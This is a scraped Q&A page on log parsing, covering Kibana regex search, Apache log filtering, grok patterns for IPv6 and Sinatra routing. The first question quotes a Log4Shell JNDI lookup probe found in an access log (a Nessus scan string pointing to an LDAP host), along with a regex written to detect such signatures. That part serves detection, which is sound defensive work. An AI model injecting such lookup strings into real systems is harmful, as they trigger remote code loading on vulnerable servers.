Problem with using regex-based search in Kibana - elasticsearch

According to this post I used proposed regex \"?\$\{(?:jndi|lower|upper|env|sys|java|date|::-j)[^\s]*\" to find jndi-signatures are used in useragent field of web-requests once by Lucene it doesn't work? please see the screenshot below:
Example: [27/Feb/2022:07:26:09 +0000] xxxx.xx.xx.xxx "-" "GET /xampp/cgi.cgi HTTP/1.1" 403 "-b" 0b 2ms "${jndi:ldap://log4shell-generic-W767eV31Ltd9L3OB6vXK${lower:ten}.w.nessus.org/nessus}" xxx.xx.xx.xxx 15638 "xxx.xxx.xx.xxx" "-" - - TLSv1.2 -,-,- It doesn't work with(out) caution marks even I checked /.*n/ based on this source.

Related

Can't take filename from Apache logs

I have an owncloud seted up myself.
Need to log for the downloads files by users.
I made the bash script which greps Apache logs and pus it to the file.
Example of line in file
/var/log/httpd/ssl_access_log-20200621-46.63.46.133 - - [18/Jun/2020:13:07:33 +0000] "GET /ocs/v2.php/apps/files_sharing/api/v1/shares?format=json&path=%2FHJC%2FMaster-Schedule%20Draft%20for%20SOP%20of%20HJC%20(10.10.2019).xlsx&shared_with_me=true HTTP/1.1" 200 108
How I can get file name "Master-Schedule Draft for SOP of HJC (10.10.2019).xlsx" ???
OK. Finally I found decision by using 'sed'
sed 's#+# #g;s#%#\\x#g' <my-log-file> | xargs -0 printf "%b" > <result-file>
It decoded URL, so all that remains to be done - get the 'path' value

filter a log file data from a certain time range

I want to write a script that asks user for the first and last date and time of the interval we want to filter our log data and I need some help.
I don't exactly know how to really find the data from that range as I can't use a single regex.
my log file looks like this:
108.162.221.147 - - [04/Aug/2016:18:59:59 +0200] "GET / HTTP/1.1" 200 10254 "-"...
141.101.99.235 - - [04/Aug/2016:19:00:00 +0200] "GET / HTTP/1.1" 200 10255 ...
108.162.242.219 - - [04/Aug/2016:19:00:00 +0200] "GET / HTTP/1.1" 200 10255...
185.63.252.237 - - [04/Aug/2016:19:00:00 +0200] "CONNECT...
108.162.221.147 - - [04/Aug/2016:19:00:00 +0200] "GET /?...
185.63.252.237 - - [04/Aug/2016:19:00:01 +0200] "CONNECT....
etc...
my script:
#!/bin/bash
echo "enter the log file name "
read fname
echo "enter the start date and time "
read startdate
echo "enter the end fate and time "
read enddate
result=$(some code for filtering rows from this range)
echo "$result" > 'log_results'
echo "results written into /root/log_results file"
I tried using
sed -n "/"$startdate"/,/"$enddate"/p" "fname"
didn't word as it couldn't see the date format because of slashes, the regex doesn't also work, as it finds only those 2 dates from log(maybe I've been writing it wrong)
how do I do this?
Usually it's best to use some kind of dedicated log parsing software for this kind of task, so that you don't have to do what you're trying to do. It's also decidedly not a job for regular expressions. However, if you must do this with text processing tools such as grep, I would suggest a two-phase approach:
Generate a list of every timestamp you want to find.
Use grep -F to find all lines in your log that contain one of those timestamps.
For example, if you only wanted to find the middle five lines of your file (the ones with the timestamp [04/Aug/2016:19:00:00 +0200]), that would make step 1 very simple (as you are generating a single-item list, with just one timestamp in it).
echo '[04/Aug/2016:19:00:00 +0200]' > interesting_times
Then find all the lines with that timestamp:
grep -F -f interesting_times logfile
You could generate a shorter list by reducing the precision of the timestamp. For example to find two entire hours of log data:
echo '[04/Aug/2016:19' > interesting_times
echo '[04/Aug/2016:20' >> interesting_times
I leave it to you to determine how to generate the list of interesting times, but seriously look into purpose-built log parsing software.

logstash parsing IPV6 address

I am a newbie to logstash / grok patterns.
In my logfile i have a line in this format as below:
::ffff:172.19.7.180 - - [10/Oct/2016:06:40:26 +0000] 1 "GET /authenticator/users HTTP/1.1" 200 7369
When I try to use a simple IP pattern matching %{IP}, using grok constructor, it shows only partial match:
after match: .19.7.180 - - [10/Oct/2016:06:33:58 +0000] 1 "POST /authenticator/searchUsers HTTP/1.1" 200 280
So, only a part of the ip address matched, as the portion 'after match' still shows remaining portion of ip address.
Queries:
1. What is this format of IP address ::ffff:172.19.7.180?
2. How to resolve this issue, to ensure IP address is correctly parsed?
BTW, I am using nodejs middleware morgan logger, which is printing IP address in this format.
Note that the log contains both IPv4 and IPv6 addresses separated by a colon, so the correct pattern you need to use is the following one:
%{IPV6:ipv6}:%{IPV4:ipv4}
Then in your event you'll have two fields:
"ipv6" => "::ffff"
"ipv4" => "172.19.7.180"
This will work until this issue is resolved.
These IP addresses are in the IPv4-Embedded IPv6 Format and the %{IP} doesn't match it. The only way to go is to either use %{DATA} or write your own regex.

Sinatra not matching any urls?

I'm trying to get Sinatra up and running with Ruby with some beginner tutorials. Sinatra works fine on '/' requests, but any extension to that seems to break it and returns the error message 'Sinatra doesn’t know this ditty.' It doesn't seem to matter what I put after the '/xxx', it all fails.
Here's my code, config.ru:
require 'sinatra'
get '/' do
"Root"
end
get "/hello" do
"hello"
end
Here's what the server is saying:
127.0.0.1 - - [14/Oct/2014 20:20:53] "GET / HTTP/1.1" 200 10 0.0016
127.0.0.1 - - [14/Oct/2014 20:20:57] "GET /hello HTTP/1.1" 404 442 0.0010
127.0.0.1 - - [14/Oct/2014 20:20:57] "GET /__sinatra__/404.png HTTP/1.1" 304 - 0.0017
Thanks for any help!
A wild guess that your request url might have a trailing slash.
Sinatra treats URLs with/without trailing slashes differently unless you append “/?” to the end of your route like so:
get "/hello/?" do
'hello'
end
The route specified above will match both “/hello and “/hello/”.

Sinatra haml page is called twice

get '/test' do
session[:my_session_id] = generate_random_id()
puts 'begin haml debug'
haml :"static/haml_page", :locals=>{:session_id => session[:my_session_id]}
end
I see in a log that a page above is constantly called twice:
begin haml debug
127.0.0.1 - - [02/Nov/2012 00:00:01] "GET / HTTP/1.1" 200 4317 1.5421
127.0.0.1 - - [02/Nov/2012 00:00:01] "GET /js/base/jquery.pjax.002902.js HTTP/1.1" 304 - 0.0234
[2012-11-02 00:00:01] WARN Could not determine content-length of response body. Set content-length of the response or set Response#chunked = true
127.0.0.1 - - [02/Nov/2012 00:00:01] "GET /css/docs.002902.css HTTP/1.1" 200 165 0.1086
.................................
begin haml debug
127.0.0.1 - - [02/Nov/2012 00:00:04] "GET / HTTP/1.1" 200 4317 1.9288
It makes me have some issues. Why is this happening?
I've moved to Puma server insted of Webrick because of similar issues.
Unfortunately I've lost example code with this problem.
In any case, if you have such problems please learn what brouser does:
Developers tool > Network (tab) will show exact sourse of request if it exists
Try to narrow this issue/bug by reducing code i.e. comment all JavaScripts, change page contents to 'Hello Wold' and observe is problem still happens
Share your code:)
Sorry for posting here, I don't know how to post this as addition to your qestion.
This is a hack, but if you really need to get it to only run the code once:
Create a global boolean variable. in the route, wrap everything in a conditional on the boolean. if false, set it true, run your code, and set it false again.

Resources